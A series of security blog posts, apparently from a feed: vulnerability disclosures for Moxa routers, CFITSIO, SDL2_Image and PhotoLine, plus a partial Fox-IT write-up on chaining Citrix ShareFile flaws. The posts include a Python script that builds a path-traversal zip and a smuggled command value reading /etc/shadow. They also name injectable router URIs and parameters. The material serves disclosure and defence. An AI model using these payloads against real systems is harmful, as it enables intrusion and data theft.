  • 8001 and 1149: On by default, but log only, not block. Customers can select block.
    • 8001: Suspicious exploit behavior, log only, available in HIPS, not in ENS
    • 1149: CMD tool access by a Windows mail client or Internet Explorer, log only, available in HIPS, not in ENS
  • 6011 and 6010: Off by default. Enabling them may result in an increase of false positives.
    • 6011: Generic application invocation protection, not present in ENS
    • 6010: Generic application hooking protection, not present in ENS

Recent campaigns exploiting Flash Player Issues

CVE-2018-4878: Currently being exploited in a massive spam mail campaign.

CVE-2017-11292: Black Oasis Advanced Persistent Threat

CVE-2016-4117: Hidden Cobra APT/CryptXXX Ransomware/Erebus APT

CVE-2016-1019: Cerber and Locky ransomware/Hidden Cobra APT

CVE-2015-3133: CryptoWall Ransomware

CVE-2015-0311: TeslaCrypt and FessLeak Ransomware

CVE-2014-8439: Cerber Ransomware

CVE-2015-7645: Cerber and Alpha Crypt Ransomware

McAfee does not control or audit third-party benchmark data or the websites referenced in this document. You should visit the referenced website and confirm whether referenced data is accurate.
McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the US and other countries. Other marks and brands may be claimed as the property of others. Copyright © 2018 McAfee, LLC

The post Despite Decline in Use of Adobe Flash, Vulnerabilities Will Continue to Cause Concern appeared first on McAfee Blogs.

Vulnerability Spotlight: Multiple Vulnerabilities in Moxa EDR-810 Industrial Secure Router

These vulnerabilities were discovered by Carlos Pacho of Cisco Talos

Today, Talos is disclosing several vulnerabilities that have been identified in Moxa EDR-810 industrial secure router.

Moxa EDR-810 is an industrial secure router with firewall/NAT/VPN and managed Layer 2 switch functions. It is designed for Ethernet-based security applications in remote control or monitoring networks. Moxa EDR-810 provides an electronic security perimeter for the protection of critical assets such as pumping/treatment systems in water stations, DCS systems in oil and gas applications, and PLC/SCADA systems in factory automation.

Moxa has released an updated version of the firmware. Users are advised to download and install the latest release as soon as possible to fix these issues.


Vulnerability Details

TALOS-2017-0472 (CVE-2017-12120) Moxa EDR-810 Web Server ping Command Injection Vulnerability


TALOS-2017-0472 is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request can cause a privilege escalation resulting in an attacker gaining a root shell. An attacker may be able to inject OS commands into the ifs= parameter of the "/goform/net_WebPingGetValue" URI to trigger this vulnerability and take control of the targeted device.

TALOS-2017-0473 (CVE-2017-12121) Moxa EDR-810 Web RSA Key Generation Command Injection Vulnerability


TALOS-2017-0473 is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request can cause a privilege escalation resulting in an attacker gaining a root shell. An attacker can inject OS commands into the rsakey_name= parameter of the "/goform/WebRSAKEYGen" URI to trigger this vulnerability and take control of the targeted device.

TALOS-2017-0474 (CVE-2017-14435 to 14437) Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities


TALOS-2017-0474 describes three separate exploitable denial of service vulnerabilities that exist in the web server functionality of Moxa EDR-810. A specially crafted HTTP request can cause a null pointer dereference (the server compares the absent Cookie header with strcmp) resulting in denial of service. An attacker can send a GET request for /MOXA_LOG.ini, /MOXA_CFG.ini or /MOXA_CFG2.ini without a Cookie header to trigger this vulnerability.

TALOS-2017-0475 (CVE-2017-12123) Moxa EDR-810 Cleartext Transmission of Password Vulnerability


TALOS-2017-0475 is an exploitable cleartext transmission of password vulnerability that exists in the web server and telnet functionality of Moxa EDR-810. An attacker may be able to inspect network traffic to retrieve the administrative password for the device. The attacker may then use the credentials to log in to the device web management console as the device administrator.

TALOS-2017-0476 (CVE-2017-12124) Moxa EDR-810 Web Server URI Denial of Service Vulnerability


TALOS-2017-0476 is an exploitable denial of service vulnerability that exists in the web server functionality of Moxa EDR-810. Access to a specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability.

TALOS-2017-0477 (CVE-2017-12125) Moxa EDR-810 Web Server Certificate Signing Request Command Injection Vulnerability


TALOS-2017-0477 is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request can cause a privilege escalation resulting in access to a root shell. An attacker may be able to inject OS commands into the CN= parameter of the "/goform/net_WebCSRGen" URI to trigger this vulnerability.

TALOS-2017-0478 (CVE-2017-12126) Moxa EDR-810 Web Server Cross-Site Request Forgery Vulnerability


TALOS-2017-0478 is an exploitable cross-site request forgery (CSRF) vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP request can trigger the CSRF, which may allow the attacker to change the device configuration. An attacker can craft a malicious HTML page that issues the request and entice a user who is logged in to the device to load it.

TALOS-2017-0479 (CVE-2017-12127) Moxa EDR-810 Plaintext Password Storage Vulnerability


TALOS-2017-0479 is a password storage vulnerability that exists in the operating system functionality of Moxa EDR-810. The device stores credentials in plaintext in /magicP/cfg4.0/cfg_file/USER_ACCOUNT.CFG. This file mirrors the contents of /etc/shadow, except that all the passwords are stored in plaintext.

TALOS-2017-0480 (CVE-2017-12128) Moxa EDR-810 Server Agent Information Disclosure Vulnerability


TALOS-2017-0480 is an exploitable information disclosure vulnerability that exists in the Server Agent functionality of Moxa EDR-810. A specially crafted TCP packet can cause the device to leak data and result in an information disclosure. An attacker may be able to send a specially crafted TCP packet to trigger this vulnerability.

TALOS-2017-0481 (CVE-2017-12129) Moxa EDR-810 Web Server Weak Cryptography for Passwords Vulnerability


TALOS-2017-0481 is an exploitable weak cryptography for passwords vulnerability that exists in the web server functionality of Moxa EDR-810. After the initial login, each authenticated request carries an unsalted MD5 hash of the password. Because MD5 is fast and the hash is unsalted, it can be cracked offline to reveal the device's password; and because the same value accompanies every request, an observer who captures it does not even need to crack it to reuse it.

TALOS-2017-0482 (CVE-2017-14432 to 14434) Moxa EDR-810 Web Server OpenVPN Config Multiple Command Injection Vulnerabilities


TALOS-2017-0482 describes multiple exploitable command injection vulnerabilities that exist in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request may cause a privilege escalation resulting in an attacker gaining a root shell. An attacker may be able to inject OS commands into various parameters of the "/goform/net_Web_get_value" URI to trigger these vulnerabilities.
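The four command-injection findings above share one root cause: a form value is spliced into a shell command line. The following C example, added here and not taken from Moxa's firmware, shows that pattern for the ping handler and a hardened replacement. Only the parameter name ifs= comes from the advisory; the handler shape, buffer sizes, validation rule and function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define CMD_MAX 256   /* hypothetical command-line buffer size */

/* Vulnerable pattern: the raw ifs= value is spliced into a shell command line
 * that the handler would then pass to system(3), i.e. to /bin/sh -c. A value
 * such as "8.8.8.8; cat /etc/shadow" is executed verbatim, and because the
 * embedded web server runs as root, so is everything after the ';'. */
int build_ping_cmd_unsafe(const char *ifs_value, char *out, size_t outsz) {
    int n = snprintf(out, outsz, "ping -c 4 %s", ifs_value);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Allow-list validation: a ping target may only be a hostname or a dotted
 * IPv4 literal. Shell metacharacters, whitespace, quotes, empty labels and a
 * leading '-' (which ping would parse as an option) are all rejected. */
int is_valid_ping_target(const char *s) {
    size_t len = strlen(s);
    if (len == 0 || len > 253) return 0;
    if (s[0] == '-' || s[0] == '.' || s[len - 1] == '.') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-')) return 0;
        if (c == '.' && s[i + 1] == '.') return 0;
    }
    return 1;
}

/* Safe pattern: validate, then build an argv for execvp(3) so the target is
 * one argument and no shell ever parses it. Returns argc or -1 on rejection. */
int build_ping_argv_safe(const char *ifs_value, const char *argv[5]) {
    if (!is_valid_ping_target(ifs_value)) return -1;
    argv[0] = "ping"; argv[1] = "-c"; argv[2] = "4";
    argv[3] = ifs_value; argv[4] = NULL;
    return 4;
}

/* Runs the validated ping without a shell; returns the child's exit status
 * or -1. Not exercised by the checks below because it needs a network. */
int run_ping_safe(const char *ifs_value) {
    const char *argv[5];
    if (build_ping_argv_safe(ifs_value, argv) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], (char *const *)argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Shows the unsafe builder passing an injected value straight through:
 * returns 1 if the command line still contains the attacker's second command. */
int demo_injection_reaches_shell(void) {
    char cmd[CMD_MAX];
    if (build_ping_cmd_unsafe("8.8.8.8; cat /etc/shadow", cmd, sizeof cmd) != 0) return 0;
    return strcmp(cmd, "ping -c 4 8.8.8.8; cat /etc/shadow") == 0;
}

/* Returns argc (4) for an accepted target or -1 when validation rejects it. */
int demo_argv_for(const char *ifs_value) {
    const char *argv[5];
    return build_ping_argv_safe(ifs_value, argv);
}

int main(void) {
    printf("injection reaches shell via unsafe builder: %d\n", demo_injection_reaches_shell());
    printf("safe argv for 8.8.8.8: %d, for '8.8.8.8; cat /etc/shadow': %d\n",
           demo_argv_for("8.8.8.8"), demo_argv_for("8.8.8.8; cat /etc/shadow"));
    return 0;
}
```

The allow-list is deliberately stricter than "strip the characters I know about": a deny-list of metacharacters is the usual way such fixes stay exploitable. Running the validated target through execvp with a fixed argv removes the shell from the path entirely, so even a validator bug can at worst produce a bad ping argument rather than a second command.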

TALOS-2017-0487 (CVE-2017-14438 and 14439) Moxa EDR-810 Service Agent Multiple Denial of Service


TALOS-2017-0487 describes two exploitable denial of service vulnerabilities that exist in the Service Agent functionality of Moxa EDR-810. A specially crafted packet can cause a denial of service. An attacker may be able to send a large packet to TCP ports 4000 or 4001 to trigger this vulnerability.

For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:

http://www.talosintelligence.com/vulnerability-reports/

Affected versions


The discovered vulnerabilities have been confirmed in Moxa EDR-810 V4.1 build 17030317 but they may also affect earlier versions of the product.

Discussion


Industrial control systems (ICS), including supervisory control and data acquisition (SCADA) systems, are used in industries such as energy providers, manufacturing and critical infrastructure providers in order to control and monitor various aspects of various industrial processes. ICS systems employ many mechanisms and protocols also used in traditional IT systems and networks.

Although some characteristics of traditional IT systems and ICS are similar, ICS also have characteristics that differ in their service level and performance requirements. Many of these differences come from the fact that ICS has a direct effect on the physical world which may also include a risk to the health and safety of the population and a potential to cause damage to the environment. For that reason ICS have unique reliability requirements and may use real-time operating systems and applications that would not be used in everyday IT environments.

One of the pillars of ICS security, as of the security of traditional IT networks, is restricting network access. This may include unidirectional gateways, a demilitarized zone (DMZ) network architecture with firewalls, and separate authentication mechanisms and credentials for users of corporate and ICS networks.

ICS devices, including firewalls that secure networks, run software which can contain vulnerabilities and serve as a pathway that may allow attackers to take advantage and intrude into an ICS network environment.

The Cisco Talos vulnerability research team also focuses on non-traditional computing environments, including ICS, to find previously unknown vulnerabilities and work with vendors to disclose them responsibly, allowing the vendor enough time to improve the security of its products by fixing the discovered vulnerabilities.

Moxa EDR-810 is a firewall designed specifically to function within ICS infrastructure and provide network security to ICS processes. Cisco Talos researchers have discovered several vulnerabilities affecting the security of the product. Moxa EDR-810 users are recommended to update the firmware as soon as possible to avoid their ICS environment being exploited by attackers.

Coverage


The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules:

  • 31939, 40880, 44835-44837, 44840-44842, 44847-44852, 44855, 44858

Vulnerability Spotlight: TALOS-2018-0529-531 – Multiple Vulnerabilities in NASA CFITSIO library

Vulnerabilities discovered by Tyler Bohan from Talos


Overview

Talos is disclosing three remote code execution vulnerabilities in the NASA CFITSIO library. CFITSIO is a library of C and Fortran subroutines for reading and writing data files in the Flexible Image Transport System (FITS) data format. FITS is a standard format endorsed by both NASA and the International Astronomical Union for astronomical data.

Specially crafted images parsed via the library can cause a stack-based buffer overflow, overwriting arbitrary data. An attacker can deliver a malicious FITS image to trigger this vulnerability and potentially gain the ability to execute code.



Details

Exploitable buffer overflow vulnerabilities exist in the image parsing functionality of the CFITSIO library version 3.42.

The FITS file format stores image metadata in an ASCII header containing keyword-value pairs. The keyword-value pairs provide details such as origin format, comments and history. Several of the functions parsing the keywords are vulnerable to stack-based overflows. In many functions the error-handling path miscalculates the length of the message it builds, and when a crafted keyword-value pair is supplied, a stack-based buffer overflow can occur.

TALOS-2018-0529/CVE-2018-3846

This vulnerability arises in multiple areas throughout the code. The keyword-value/comment pairs are incorrectly checked for length in error messaging throughout. The error buffers used are not large enough, and a crafted value-comment pair can cause an overflow. Most notably, this flaw arises in the main header parsing functionality.

TALOS-2018-0530/CVE-2018-3847

The fits_read_keyn function is responsible for parsing out a specific keyname, and returning the value comment pair. As described above, this vulnerability is present in the error handling of this function. By passing in a specially crafted image, an attacker can cause an error message in this function, and the error buffer is not large enough, causing a buffer overflow.

TALOS-2018-0531/CVE-2018-3848 - CVE-2018-3849

The fits_read_btblhdr function is responsible for getting data from a binary table inside a FITS image. This function's main purpose is to parse the header keywords and validate them to ensure they conform to the FITS standard. The fits_read_btblhdr function does not check the input properly on the error messaging, and is vulnerable against buffer overflows.

This vulnerability is similar to the vulnerability discussed above. The fits_read_atblhdr function is responsible for parsing an ASCII table inside a FITS image. It also does not handle errors properly, and is vulnerable to buffer overflows.
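The three CFITSIO reports above describe the same defect: a fixed-size error buffer receiving a message built from an attacker-controlled keyword value. The following C example, added here and not CFITSIO's code, parses an 80-column FITS header card and shows the unbounded error-message write beside a bounded one. The constant names mirror CFITSIO's (FLEN_CARD, FLEN_VALUE, FLEN_ERRMSG); their use as the message buffer size and the exact message text are assumptions, and the hostile card is constructed for the example.

```c
#include <stdio.h>
#include <string.h>

#define FLEN_CARD   81   /* 80-column card + NUL; CFITSIO's name for this limit */
#define FLEN_VALUE  71   /* longest keyword value + NUL */
#define FLEN_ERRMSG 81   /* error-message buffer; assumed to match CFITSIO */

typedef struct { char keyword[9]; char value[FLEN_VALUE]; char comment[73]; } Card;

/* Split one 80-column header card into keyword (columns 1-8), value and
 * comment. A value is either a quoted string ('' escapes a quote) or a
 * free-format token; '/' introduces the comment. Returns 0, or -1 if the card
 * is longer than 80 columns. */
int parse_card(const char *card, Card *out) {
    size_t n = strlen(card), p = 10, v = 0, c = 0, k = 0;
    memset(out, 0, sizeof *out);
    if (n > 80) return -1;
    for (; k < 8 && k < n; k++) out->keyword[k] = card[k];
    while (k > 0 && out->keyword[k - 1] == ' ') out->keyword[--k] = '\0';
    if (n < 10 || card[8] != '=' || card[9] != ' ') return 0;   /* no value field */
    while (p < n && card[p] == ' ') p++;
    if (p < n && card[p] == '\'') {                               /* quoted string */
        for (p++; p < n; p++) {
            if (card[p] == '\'') {
                if (p + 1 < n && card[p + 1] == '\'') p++;         /* '' -> ' */
                else { p++; break; }
            }
            if (v < FLEN_VALUE - 1) out->value[v++] = card[p];
        }
    } else {
        for (; p < n && card[p] != ' ' && card[p] != '/'; p++)
            if (v < FLEN_VALUE - 1) out->value[v++] = card[p];
    }
    while (p < n && card[p] == ' ') p++;
    if (p < n && card[p] == '/') {
        for (p++; p < n && card[p] == ' '; p++) ;
        for (; p < n && c < sizeof out->comment - 1; p++) out->comment[c++] = card[p];
    }
    return 0;
}

#define ERR_FMT "Error reading keyword %s: illegal value '%s'"

/* Vulnerable pattern: an unbounded write into the fixed error buffer. The
 * fixed text alone is 40 bytes, the keyword up to 8 and the value up to 70,
 * so a hostile header overruns the 81-byte buffer on the stack. Never call
 * this on untrusted cards; it is here only to show the shape of the bug. */
void format_errmsg_unsafe(const Card *c, char out[FLEN_ERRMSG]) {
    sprintf(out, ERR_FMT, c->keyword, c->value);
}

/* Bytes the message for this card needs, including the NUL. */
int errmsg_bytes_needed(const Card *c) {
    return snprintf(NULL, 0, ERR_FMT, c->keyword, c->value) + 1;
}

/* Hardened pattern: bounded write, always NUL-terminated. Returns 1 if the
 * message was truncated, 0 otherwise. */
int format_errmsg_safe(const Card *c, char out[FLEN_ERRMSG]) {
    int n = snprintf(out, FLEN_ERRMSG, ERR_FMT, c->keyword, c->value);
    return n >= FLEN_ERRMSG;
}

/* Constructed hostile card: a 68-character string value fills all 80 columns. */
static void hostile_card(char card[FLEN_CARD]) {
    memcpy(card, "BADKEY  = '", 11);
    memset(card + 11, 'A', 68);
    card[79] = '\'';
    card[80] = '\0';
}

/* Message size the hostile card forces on the error path (115 > FLEN_ERRMSG). */
int demo_hostile_card_bytes_needed(void) {
    char card[FLEN_CARD]; Card c;
    hostile_card(card);
    if (parse_card(card, &c) != 0) return -1;
    return errmsg_bytes_needed(&c);
}

/* Same card through the hardened formatter: 1 if truncated and still in bounds. */
int demo_hostile_card_truncated(void) {
    char card[FLEN_CARD], msg[FLEN_ERRMSG]; Card c;
    hostile_card(card);
    if (parse_card(card, &c) != 0) return 0;
    return format_errmsg_safe(&c, msg) == 1 && strlen(msg) == FLEN_ERRMSG - 1;
}

/* Sanity check of the parser on two well-formed constructed cards. */
int demo_parse_ok(void) {
    Card a, b;
    if (parse_card("SIMPLE  =                    T / file does conform to FITS standard", &a)) return 0;
    if (parse_card("OBJECT  = 'O''NEIL' / name", &b)) return 0;
    return strcmp(a.keyword, "SIMPLE") == 0 && strcmp(a.value, "T") == 0
        && strcmp(a.comment, "file does conform to FITS standard") == 0
        && strcmp(b.keyword, "OBJECT") == 0 && strcmp(b.value, "O'NEIL") == 0
        && strcmp(b.comment, "name") == 0;
}

int main(void) {
    printf("parser ok: %d, hostile card needs %d bytes (buffer %d), safe path truncated: %d\n",
           demo_parse_ok(), demo_hostile_card_bytes_needed(), FLEN_ERRMSG,
           demo_hostile_card_truncated());
    return 0;
}
```

The arithmetic is the whole bug: a card is 80 columns, so any message that prepends more than a few words to a full-length value cannot fit in an 81-byte buffer, and an error path is exactly where a parser encounters the values an attacker chose. Error paths deserve the same bounded-write discipline as the happy path.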

More details can be found in the Talos Vulnerability Reports TALOS-2018-0529, TALOS-2018-0530 and TALOS-2018-0531.


Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.


Snort Rule: 45697-45700, 45701-45714




Vulnerability Spotlight: Multiple Simple DirectMedia Layer Vulnerabilities

Discovered by Lilith Wyatt of Cisco Talos

Overview



Talos is disclosing several vulnerabilities identified in Simple DirectMedia Layer's SDL2_Image library that could allow code execution. Simple DirectMedia Layer is a cross-platform development library designed to provide low level access to audio, keyboard, mouse, joystick, and graphics hardware via OpenGL and Direct3D. It is used by video playback software, emulators, and popular games including Valve's award-winning catalog and many Humble Bundle games. SDL officially supports Windows, Mac OS X, Linux, iOS, and Android. Support for other platforms may be found in the source code. The SDL2_Image library is an optional component for SDL that deals specifically with parsing and displaying a variety of image file formats, creating a single and uniform API for image processing, regardless of the type. The latest SDL version (2.0.8) can be found here.

TALOS-2018-0519  - Simple DirectMedia Layer SDL2_Image IMG_LoadPCX_RW Information Disclosure Vulnerability (CVE-2018-3837)



An exploitable vulnerability exists in the PCX image rendering functionality of SDL2_image-2.0.2. A specially crafted PCX image can cause an out-of-bounds read on the heap, resulting in information disclosure. An attacker can display a specially crafted image to trigger this vulnerability.

TALOS-2018-0520 - Simple DirectMedia Layer SDL2_Image load_xcf_tile_rle Information Disclosure Vulnerability (CVE-2018-3838)



An exploitable vulnerability exists in the XCF image rendering functionality of SDL2_image-2.0.2. A specially crafted XCF image can cause an out-of-bounds read on the heap, resulting in information disclosure. An attacker can display a specially crafted image to trigger this vulnerability.

TALOS-2018-0521 - Simple DirectMedia Layer SDL2_Image load_xcf_tile_rle bpp Code Execution Vulnerability (CVE-2018-3839)



An exploitable vulnerability exists in the XCF image rendering functionality of SDL2_image-2.0.2. A specially crafted XCF image can cause an out-of-bounds read on the heap, resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability.

Coverage



The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 45017-45018, 45599-45600,45605-45606

Vulnerability Spotlight: Multiple Computerinsel PhotoLine PSD Code Execution Vulnerabilities



Discovered by Tyler Bohan of Cisco Talos

Overview


Today, Cisco Talos is disclosing several vulnerabilities in Computerinsel PhotoLine's image-parsing functionality, covering its PSD, TIFF and PCX parsers. PhotoLine is an image processing tool used to modify and edit images, as well as other graphic-related material. This product has a large user base and is popular in its specific field. PSD is a document format used by Adobe Photoshop and is supported by many third-party applications throughout the industry.

In the PSD case, the vulnerability arises in parsing the document. The application takes data directly from the document without verification and uses it to calculate an address. A specially crafted blending channel value in the document leads to this miscalculation.

TALOS-2018-0546 - Computerinsel Photoline TIFF Samples Per Pixel Parsing Code Execution Vulnerability (CVE-2018-3861)


A memory corruption vulnerability exists in the TIFF parsing functionality of Computerinsel Photoline 20.53. A specially crafted TIFF image processed via the application can lead to an out of bounds write overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0547 - Computerinsel Photoline TIFF Bits Per Pixel Parsing Code Execution Vulnerability (CVE-2018-3862)


A memory corruption vulnerability exists in the TIFF parsing functionality of Computerinsel Photoline 20.53. A specially crafted TIFF image processed via the application can lead to an out of bounds write overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0550 - Computerinsel Photoline PSD Blending Channels Code Execution Vulnerability (CVE-2018-0550)


A memory corruption vulnerability exists in the PSD-parsing functionality of Computerinsel PhotoLine 20.53. A specially crafted PSD document processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PSD document to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0561 - Computerinsel Photoline PCX Decompress Code Execution Vulnerability (CVE-2018-3886)


A memory corruption vulnerability exists in the PCX parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0562 - Computerinsel Photoline PCX Run Length Code Execution Vulnerability (CVE-2018-3887)


A memory corruption vulnerability exists in the PCX parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0563 - Computerinsel Photoline PCX Color Map Code Execution Vulnerability (CVE-2018-3888)


A memory corruption vulnerability exists in the PCX parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0564 - Computerinsel Photoline PCX Bits Per Pixel Code Execution Vulnerability (CVE-2018-3889)


A memory corruption vulnerability exists in the PCX parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out of bounds write overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

Known vulnerable versions


Computerinsel PhotoLine 20.53 for OS X

(https://www.pl32.com)

Coverage


The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Console or Snort.org.

Snort Rules: 39601-39632, 45997-46000, 46093-46094, 46222-46223, 46224-46225, 46143-46146, 46241-46242

Compromising Citrix ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities, which together allowed any account to (from the internet) access any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several Fortune 500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the cloud or with an on-premise component).

Sharefile

Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at name.sharefile.eu (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the file transfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request, such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see an h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following python code creates a special zip file called out.zip, which contains two files, one of which has a relative path.

import zipfile
# the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
# the name of the malicious file that will overwrite the original file (must exist on disk)
fname = 'xxe_oob.xml'
# destination path of the file inside the archive: a relative path that escapes the extraction directory
zf.write(fname, '../../../../testbestand_fox.tmp')
# random extra file (not required)
# example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')
# write the central directory so the archive is complete
zf.close()

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user-controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path is c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\; we can then add a file with the name ../storage/subdirectory/filename.txt, which will be written to the target directory. The ../ part indicates that the operating system should go one directory higher in the directory tree and use the rest of the path from that location.
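An extraction routine that resolves each entry and refuses anything that would land outside the destination, as an added example (not ShareFile's code): build_traversal_zip constructs in memory the same two-entry archive the script above creates, naive_target shows where an extractor that trusts the entry name would write the traversal entry, and safe_extract writes only the entry that stays inside the upload directory.

```python
import io
import os
import tempfile
import zipfile


def build_traversal_zip():
    """Constructed in-memory archive with the same two entries as the post's out.zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('../../../../testbestand_fox.tmp', b'attacker-controlled content')
        zf.writestr('tfile', b'harmless content')
    return buf.getvalue()


def naive_target(dest, member_name):
    """Where an extractor that joins dest and the entry name verbatim would write (the vulnerable pattern)."""
    return os.path.normpath(os.path.join(dest, member_name))


def safe_target(dest, member_name):
    """Resolve member_name under dest; return None when it would land outside dest."""
    dest_real = os.path.realpath(dest)
    # conservative: absolute entries and drive-letter style names are never legitimate here
    if member_name.startswith(('/', '\\')) or ':' in member_name:
        return None
    candidate = os.path.realpath(os.path.join(dest_real, member_name))
    # after resolving '..' and symlinks, the target must be dest itself or below it
    if os.path.commonpath([dest_real, candidate]) != dest_real:
        return None
    return candidate


def safe_extract(zip_bytes, dest):
    """Extract only entries that resolve inside dest; return (written paths, rejected entry names)."""
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = safe_target(dest, info.filename)
            if target is None:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, 'wb') as dst:
                dst.write(src.read())
            written.append(target)
    return written, rejected


def demo():
    """Run the safe extractor on the constructed archive inside a scratch upload directory."""
    with tempfile.TemporaryDirectory() as scratch:
        # mimics files/<uploadid>/ below the StorageZone data directory (layout is an assumption)
        dest = os.path.join(scratch, 'files', 'rsu-2351e6ffe2fc462492d0501414479b95')
        os.makedirs(dest)
        written, rejected = safe_extract(build_traversal_zip(), dest)
        with open(os.path.join(dest, 'tfile'), 'rb') as fh:
            content = fh.read()
        naive = naive_target(dest, '../../../../testbestand_fox.tmp')
        naive_escapes = os.path.commonpath([dest, naive]) != dest
    return {
        'written': [os.path.basename(p) for p in written],
        'rejected': rejected,
        'tfile_content': content,
        'naive_escapes': naive_escapes,
    }
```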

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistentstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

